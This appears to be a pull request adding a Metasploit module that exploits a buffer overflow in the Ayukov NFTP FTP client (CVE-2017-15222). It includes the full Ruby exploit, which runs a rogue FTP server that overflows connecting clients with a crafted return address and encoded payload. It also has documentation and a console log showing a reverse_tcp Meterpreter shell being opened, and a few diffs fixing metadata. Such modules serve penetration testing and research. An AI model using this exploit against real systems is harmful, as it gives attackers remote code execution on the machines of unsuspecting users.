### PR TITLE
Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow

### DIFF
--- a/documentation/modules/exploit/windows/ftp/ayukov_nftp.md
+++ b/documentation/modules/exploit/windows/ftp/ayukov_nftp.md
@@ -1,0 +1,36 @@
+## Vulnerable Application
+
+  Tested on Windows XP Professional SP3 EN
+
+  Install the application from the link below.
+
+  [NFTP 1.71](https://www.exploit-db.com/apps/a766d928899200ed6a21f7c790b5cbe5-nftp-1.71-i386-win32.exe)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/ftp/ayukov_nftp```
+  4. Set options and payload
+  5. Do: ```exploit```
+  6. Connect to the FTP server using the NFTP FTP client
+  6. You should get a shell
+
+## Scenarios
+
+  To obtain a shell:
+
+  ```
+msf > use exploit/windows/ftp/ayukov_nftp
+msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5 
+LHOST => 192.168.216.5
+msf exploit(windows/ftp/ayukov_nftp) > exploit 
+[*] Exploit running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.216.5:4444 
+msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
+[*] Sending stage (179779 bytes) to 192.168.216.156
+[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500
+  ```

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -10,19 +10,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow',
+      'Name'           => 'Ayukov NFTP FTP Client Remote Buffer Overflow',
       'Description'    => %q{
           This module exploits a buffer overflow in the Ayukov NFTPD FTP client 2.0 and earlier allowing remote code execution.
       },
       'Author'   =>
         [
-          'Berk Cem Göksel',  # Original exploit author
+          'Berk Cem Goksel',  # Original exploit author
           'Daniel Teixeira'   # MSF module author
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', 'CVE-2017-15222'],
+          [ 'CVE', '2017-15222'],
           [ 'EDB', '43025' ],
         ],
       'Payload'        =>
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
     'SRVHOST' => '0.0.0.0',
         },
       'DefaultTarget'  => 0))
+    'DisclosureDate' => 'Oct 21 2017'))
 
     register_options(
       [
@@ -67,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << payload.encoded
     sploit << make_nops(15000 - 4116 - 4 - 16 - payload.encoded.length)
     sploit << "\r\n"
-  
+
     client.put(sploit)
 
     client.get_once

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -37,10 +37,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'DefaultOptions' =>
         {
-    'SRVHOST' => '0.0.0.0',
+      'SRVHOST' => '0.0.0.0',
         },
+      'DisclosureDate' => 'Oct 21 2017',
       'DefaultTarget'  => 0))
-    'DisclosureDate' => 'Oct 21 2017'))
 
     register_options(
       [

--- a/modules/exploits/windows/ftp/ayukov_nftp.rb
+++ b/modules/exploits/windows/ftp/ayukov_nftp.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::TcpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the Ayukov NFTPD FTP client 2.0 and earlier allowing remote code execution.
+      },
+      'Author'   =>
+        [
+          'Berk Cem Göksel',  # Original exploit author
+          'Daniel Teixeira'   # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', 'CVE-2017-15222'],
+          [ 'EDB', '43025' ],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x01\x0a\x10",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+    [ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+    'SRVHOST' => '0.0.0.0',
+        },
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
+      ])
+  end
+
+  def on_client_connect(client)
+    return if ((p = regenerate_payload(client)) == nil)
+
+
+    # Let the client log in
+    client.get_once
+
+    user = "331 OK.\r\n"
+    client.put(user)
+
+    client.get_once
+    pass = "230 OK.\r\n"
+    client.put(pass)
+
+    sploit = "A"*4116
+    sploit << [target.ret].pack('V')
+    sploit << "\x90"*16
+    sploit << payload.encoded
+    sploit << make_nops(15000 - 4116 - 4 - 16 - payload.encoded.length)
+    sploit << "\r\n"
+  
+    client.put(sploit)
+
+    client.get_once
+    pwd = "257\r\n"
+    client.put(pwd)
+    client.get_once
+
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit a remote buffer overflow in the Ayukov NFTP FTP Client.

Tested on: Windows XP Professional SP3 EN x86

## Verification

List the steps needed to make sure this thing works

- [x] Install the application
- [x] Start `msfconsole`
- [x] `use exploit/windows/ftp/ayukov_nftp`
- [x] Set the payload
- [x] Exploit
- [x] Connect to the FTP server using the NFTP FTP client
- [x] Get a session

## Example

```
msf > use exploit/windows/ftp/ayukov_nftp
msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5 
LHOST => 192.168.216.5
msf exploit(windows/ftp/ayukov_nftp) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.216.5:4444 
msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
[*] Sending stage (179779 bytes) to 192.168.216.156
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500
```